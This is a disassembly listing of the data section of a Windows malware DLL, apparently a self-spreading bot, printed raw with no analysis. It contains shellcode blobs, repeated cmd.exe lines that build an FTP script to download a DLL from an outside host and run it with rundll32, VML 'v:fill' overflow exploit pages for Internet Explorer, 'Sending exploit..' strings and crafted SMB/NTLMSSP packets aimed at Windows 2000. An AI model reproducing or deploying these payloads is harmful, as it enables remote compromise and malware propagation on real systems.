dword_1000E158 dd 0 ; DATA XREF: sub_100019DF+A6�o
dd 800000D4h, 0
; char buf[]
buf db '',0 ; DATA XREF: sub_10001BDB+A�o
dw 4400h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
byte_1000E1B0 db 41h ; DATA XREF: .text:10001E2A�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWfì€',0 ; DATA XREF: sub_10001EBF+DE�o
aIcsa db '‰æèí',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_1000E35C dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: sub_10001EBF+52�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_1000E3EC dd 23h ; DATA XREF: sub_100013AB+2D�o
; char dword_1000E3F0[]
dword_1000E3F0 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_10001433+107�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_10001433+185�o
align 4
dword_1000E404 dd 3 ; DATA XREF: sub_10001433+29C�o
; char dword_1000E408[]
dword_1000E408 dd 0A1h ; DATA XREF: sub_10001433+30B�o
; char dword_1000E40C[]
dword_1000E40C dd 30h ; DATA XREF: sub_10001433+338�o
; char dword_1000E410[]
dword_1000E410 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_10001433+365�o
; char dword_1000E41C[]
dword_1000E41C dd 60h ; DATA XREF: sub_10001433+392�o
; char Format[]
Format db '%s.dll',0 ; DATA XREF: sub_10001EBF+6C�o
align 4
; char aCmd_exeCEchoOp[]
aCmd_exeCEchoOp db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_10001EBF+A0�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
aP:
unicode 0, <P>,0
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
; char aS_5[]
aS_5 db '\%s',0 ; DATA XREF: sub_10002157+3C�o
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: sub_10002157+195�o
align 4
; char Delim[]
Delim: ; DATA XREF: sub_10002157+1AF�o
dw 0Ah
unicode 0, <>,0
; char Source[]
Source: ; DATA XREF: sub_10002157+235�o
unicode 0, <*>,0
; char asc_1000E8B4[]
asc_1000E8B4: ; DATA XREF: sub_100024A5+5D�o
dw 0Ah
unicode 0, <>,0
; char aHead[]
aHead db '<head>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+91�o
align 4
; char aTitleSiteOffli[]
aTitleSiteOffli db '<title>Site Offline.</title>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+F6�o
align 4
; char aStyle[]
aStyle db '<style>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+133�o
align 10h
; char aVBehaviorUrlDe[]
aVBehaviorUrlDe db 'v:* { behavior: url(#default#VML); }',0Dh,0Ah,0
; DATA XREF: sub_100024A5+170�o
align 4
; char aStyle_0[]
aStyle_0 db '</style>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+1AD�o
align 4
; char aHead_0[]
aHead_0 db '</head>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+1EA�o
align 10h
; char aBody[]
aBody db '<body>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+227�o
align 4
; char aVFillMethodAaa[]
aVFillMethodAaa db '<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
; DATA XREF: sub_100024A5+264�o
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAA쳝砀邐邐邐邐&#'
db '37008;邐邐邐邐邐邐邐�'
db '6459;澾潯买澿〰佰㥃�'
db '011;䯻㎀㧮ﱳ폿潮ğ'
db '83;䬇뇮侊깥ਰ'
db '2;敃ᥥڷ&'
db '#5900;膆蛮鲛莂ᆺ篸8'
db '838;淮츂㉥캄ᆽᝪ'
db '5;닭삏⦋雪�븮'
db ';붾뺹렑旾븲ᆽ&'
db '#47121;뿢斸튛驥雀ᯭ斸�'
db '2888;ᯭ⟝꾧�﹐‘'
db '48;┯긴ἅছ新&'
db '#51888;㏭斈ꗢ끥攳旪&#'
db '11245;끅렆ᄑ怑⼂�'
db '67;癖搐郠శ�쇴㎞'
db ';纖繾繾繾繾繾繾繾'
db '繾繾繾繾敾渲〰遰/'
db '>',0Dh,0Ah,0
align 4
; char aVRect[]
aVRect db '</v:rect>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+2A1�o
; char aBody_0[]
aBody_0 db '</body>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+2DE�o
align 10h
; char aHtml[]
aHtml db '</html>',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+31B�o
align 4
aSSendingExploi db '%s Sending exploit..',0 ; DATA XREF: sub_100024A5+35D�o
align 4
; char aS_dll_0[]
aS_dll_0 db '%s.dll',0 ; DATA XREF: sub_100024A5+389�o
align 4
; char aCmd_exeCEcho_0[]
aCmd_exeCEcho_0 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_100024A5+3BD�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 10h
; char aVFillMethodA_0[]
aVFillMethodA_0 db '<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
; DATA XREF: sub_100024A5:loc_10002891�o
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAA쳝砀邐邐邐邐&#'
db '37008;邐邐邐邐邐邐邐�'
db '6459;澾潯买澿〰佰㥃�'
db '011;䯻㎀㧮ﱳ폿潮ğ'
db '83;䬇뇮侊깥ਰ'
db '2;敃ᥥڷ&'
db '#5900;膆蛮鲛莂ᆺ篸8'
db '838;淮츂㉥캄ᆽᝪ'
db '5;닭삏⦋雪�븮'
db ';붾뺹렑旾븲ᆽ&'
db '#47121;뿢斸튛驥雀ᯭ斸�'
db '2888;ᯭ⟝꾧�﹐‘'
db '48;┯긴ἅছ新&'
db '#51888;㏭斈ꗢ끥攳旪&#'
db '11245;끅렆ᄑ怑⼂�'
db '67;癖搐郠శ�쇴㎞'
db ';纖繾繾繾繾繾繾繾'
db '繾繾繾繾敾渲〰遰/'
db '>',0Dh,0Ah,0
align 4
; char aVFillMethodA_1[]
aVFillMethodA_1 db '<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
; DATA XREF: sub_100024A5+4AA�o
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAA쳝砀邐邐邐邐&#'
db '37008;邐邐邐邐邐邐邐�'
db '6459;澾潯买澿〰佰㥃�'
db '011;䯻㎀㧮ﱳ폿潮ğ'
db '83;䬇뇮侊깥ਰ'
db '2;敃ᥥڷ&'
db '#5900;膆蛮鲛莂ᆺ篸8'
db '838;淮츂㉥캄ᆽᝪ'
db '5;닭삏⦋雪�븮'
db ';붾뺹렑旾븲ᆽ&'
db '#47121;뿢斸튛驥雀ᯭ斸�'
db '2888;ᯭ⟝꾧�﹐‘'
db '48;┯긴ἅছ新&'
db '#51888;㏭斈ꗢ끥攳旪&#'
db '11245;끅렆ᄑ怑⼂�'
db '67;癖搐郠శ�쇴㎞'
db ';纖繾繾繾繾繾繾繾'
db '繾繾繾繾敾渲〰遰/'
db '>',0Dh,0Ah,0
align 4
; char Str2[]
Str2 db '..',0 ; DATA XREF: sub_100024A5+527�o
align 4
; char a_[]
a_: ; DATA XREF: sub_100024A5+543�o
unicode 0, <.>,0
aPm db 'PM',0 ; DATA XREF: sub_100024A5+597�o
align 4
aAm db 'AM',0 ; DATA XREF: sub_100024A5:loc_10002A48�o
align 4
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_100024A5+627�o
; char aVFillMethodA_2[]
aVFillMethodA_2 db '<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
; DATA XREF: sub_100024A5+668�o
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAA쳝砀邐邐邐邐&#'
db '37008;邐邐邐邐邐邐邐�'
db '6459;澾潯买澿〰佰㥃�'
db '011;䯻㎀㧮ﱳ폿潮ğ'
db '83;䬇뇮侊깥ਰ'
db '2;敃ᥥڷ&'
db '#5900;膆蛮鲛莂ᆺ篸8'
db '838;淮츂㉥캄ᆽᝪ'
db '5;닭삏⦋雪�븮'
db ';붾뺹렑旾븲ᆽ&'
db '#47121;뿢斸튛驥雀ᯭ斸�'
db '2888;ᯭ⟝꾧�﹐‘'
db '48;┯긴ἅছ新&'
db '#51888;㏭斈ꗢ끥攳旪&#'
db '11245;끅렆ᄑ怑⼂�'
db '67;癖搐郠శ�쇴㎞'
db ';纖繾繾繾繾繾繾繾'
db '繾繾繾繾敾渲〰遰/'
db '>',0Dh,0Ah,0
align 4
; char aSS_0[]
aSS_0 db '%s%s/',0 ; DATA XREF: sub_100024A5+6B0�o
align 4
; char aCode_29sGtCode[]
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_100024A5+708�o
align 4
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_100024A5+72B�o
align 4
; char aTdTdWidthDCode[]
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_100024A5+77D�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSSendingExpl_0 db '%s Sending exploit..',0 ; DATA XREF: sub_100024A5+7BF�o
align 4
; char aS_dll_1[]
aS_dll_1 db '%s.dll',0 ; DATA XREF: sub_100024A5+7EB�o
align 4
; char aCmd_exeCEcho_1[]
aCmd_exeCEcho_1 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_100024A5+81F�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 10h
; char aS[]
aS db '<%s>',0 ; DATA XREF: sub_100024A5+85A�o
align 4
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+882�o
align 4
aSSendingExpl_1 db '%s Sending exploit..',0 ; DATA XREF: sub_100024A5+8C4�o
align 10h
; char aS_dll_2[]
aS_dll_2 db '%s.dll',0 ; DATA XREF: sub_100024A5+8F0�o
align 4
; char aCmd_exeCEcho_2[]
aCmd_exeCEcho_2 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_100024A5+924�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_100024A5+976�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
; char aSS_1[]
aSS_1 db '%s%s',0 ; DATA XREF: sub_100024A5+9BE�o
align 4
; char aCode_30sGtCode[]
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_100024A5+A1B�o
align 4
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_100024A5+A3E�o
align 4
; char aTdTdWidthDCo_0[]
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_100024A5+A9A�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aSSendingExpl_2 db '%s Sending exploit..',0 ; DATA XREF: sub_100024A5+ADC�o
align 4
; char aS_dll_3[]
aS_dll_3 db '%s.dll',0 ; DATA XREF: sub_100024A5+B08�o
align 4
; char aCmd_exeCEcho_3[]
aCmd_exeCEcho_3 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_100024A5+B3B�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_100024A5+B81�o
align 4
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_100024A5+BD6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
; char aVFillMethodA_3[]
aVFillMethodA_3 db '<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
; DATA XREF: sub_100024A5:loc_10003097�o
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAA쳝砀邐邐邐邐&#'
db '37008;邐邐邐邐邐邐邐�'
db '6459;澾潯买澿〰佰㥃�'
db '011;䯻㎀㧮ﱳ폿潮ğ'
db '83;䬇뇮侊깥ਰ'
db '2;敃ᥥڷ&'
db '#5900;膆蛮鲛莂ᆺ篸8'
db '838;淮츂㉥캄ᆽᝪ'
db '5;닭삏⦋雪�븮'
db ';붾뺹렑旾븲ᆽ&'
db '#47121;뿢斸튛驥雀ᯭ斸�'
db '2888;ᯭ⟝꾧�﹐‘'
db '48;┯긴ἅছ新&'
db '#51888;㏭斈ꗢ끥攳旪&#'
db '11245;끅렆ᄑ怑⼂�'
db '67;癖搐郠శ�쇴㎞'
db ';纖繾繾繾繾繾繾繾'
db '繾繾繾繾敾渲〰遰/'
db '>',0Dh,0Ah,0
align 4
aSSendingExpl_3 db '%s Sending exploit..',0 ; DATA XREF: sub_100030D9+66�o
align 10h
; char aS_dll_4[]
aS_dll_4 db '%s.dll',0 ; DATA XREF: sub_100030D9+92�o
align 4
; char aCmd_exeCEcho_4[]
aCmd_exeCEcho_4 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_100030D9+C6�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
; char SubStr[]
SubStr db 'GET ',0 ; DATA XREF: sub_1000329E+492�o
align 4
; char asc_10010AC4[]
asc_10010AC4: ; DATA XREF: sub_1000329E+4BF�o
unicode 0, < >,0
; char asc_10010AC8[]
asc_10010AC8: ; DATA XREF: sub_1000329E+4C4�o
unicode 0, < >,0
; char aGet_0[]
aGet_0 db 'GET ',0 ; DATA XREF: sub_1000329E+4C9�o
align 4
; char asc_10010AD4[]
asc_10010AD4 db 0Dh,0Ah,0 ; DATA XREF: sub_1000329E:loc_100037B7�o
align 4
aSSendingExpl_4 db '%s Sending exploit..',0 ; DATA XREF: sub_1000329E+6A4�o
align 10h
; char aS_dll_5[]
aS_dll_5 db '%s.dll',0 ; DATA XREF: sub_1000329E+6D0�o
align 4
; char aCmd_exeCEcho_5[]
aCmd_exeCEcho_5 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: sub_1000329E+703�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
; char aTextHtml[]
aTextHtml db 'text/html',0 ; DATA XREF: StartAddress+7E�o
align 4
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: StartAddress+97�o
align 4
; char aDddDdMmmYyyy[]
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: StartAddress+B5�o
align 4
; char aHhMmSs[]
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: StartAddress+D2�o
align 4
; char aHttp1_0200OkSe[]
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: StartAddress+120�o
db 'Server: HTTPd',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: StartAddress+174�o
db 'Server: HTTPd',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aSSendingExpl_5 db '%s Sending exploit..',0 ; DATA XREF: StartAddress+1B9�o
align 4
; char aS_dll_6[]
aS_dll_6 db '%s.dll',0 ; DATA XREF: StartAddress+1E5�o
align 10h
; char aCmd_exeCEcho_6[]
aCmd_exeCEcho_6 db 'cmd.exe /C echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo g'
; DATA XREF: StartAddress+219�o
db 'et %s>>x&echo bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0
align 4
; char aB[]
aB: ; DATA XREF: sub_10003D60+C3�o
unicode 0, <>
dw 4400h
aCkfdenecfdef_0 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacaca_0 db ' CACACACACACACACACACACACACACACAAA',0
; char byte_10010E7C[]
byte_10010E7C db 3 dup(0) ; DATA XREF: sub_10003D60+F7�o
db 54h
dd 424D53FFh, 72h, 28011800h, 3 dup(0)
dd 1D300000h, 0EC840000h, 2003100h, 4D4E414Ch, 2E314E41h
dd 4C020030h, 322E314Dh, 32303058h, 544E0200h, 4E414C20h
dd 204E414Dh, 302E31h, 20544E02h, 30204D4Ch, 32312Eh
; char byte_10010ED4[]
byte_10010ED4 db 3 dup(0) ; DATA XREF: sub_10003D60+12E�o
db 0B5h
dd 424D53FFh, 73h, 28011800h, 3 dup(0)
dd 1D300000h, 0EC840000h, 0FF0Ch, 2FFDF00h, 100h, 57000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Ah, 0, 60h
db 55h ; U
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Bh, 30h
db 49h ; I
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 37h, 4
a5ntlmssp db '5NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 0Ch, 0, 0Ch
db 0
db 29h, 2 dup(0)
db 0
aWorkgroupworks db 'WORKGROUPWORKSTATION1Windows 2000 2195',0
aWindows20005_0 db 'Windows 2000 5.0',0
align 10h
; char byte_10010F90[]
byte_10010F90 db 2 dup(0) ; DATA XREF: sub_10003D60+165�o
dw 401h
dd 424D53FFh, 73h, 28011800h, 3 dup(0)
dd 1D300000h, 0EC840800h, 0FF0Ch, 2FFDF00h, 100h, 0A6000000h
dd 0
dd 0D05C00h, 0A100C980h, 8130A381h, 9D81A2A0h, 4E9A8104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 18000000h, 82001800h, 2 dup(0)
dd 1000000h, 802h, 4030201h, 70605h, 3 dup(0)
db 0
db 2 dup(0), 25h
db 0A6h ; ¦
db 9Fh, 80h, 96h
db 31h ; 1
db 6Ch, 0CAh, 0A0h
db 8
db 9Fh, 12h, 7Eh
db 47h ; G
db 0CDh, 45h, 10h
db 25h ; %
db 39h, 7Dh, 0F8h
db 55h ; U
db 66h, 3, 57h
db 0
db 4Fh, 0, 52h
db 0
db 4Bh, 0, 47h
db 0
db 52h, 0, 4Fh
db 0
db 55h, 0, 50h
db 0
db 57h, 0, 4Fh
db 0
db 52h, 0, 4Bh
db 0
db 53h, 0, 54h
db 0
db 41h, 0, 54h
db 0
db 49h, 0, 4Fh
db 0
db 4Eh, 0, 31h
db 0
aWindows2000219 db 'Windows 2000 2195',0
aWindows20005_1 db 'Windows 2000 5.0',0
; char byte_10011098[]
byte_10011098 db 3 dup(0) ; DATA XREF: sub_10003D60+199�o
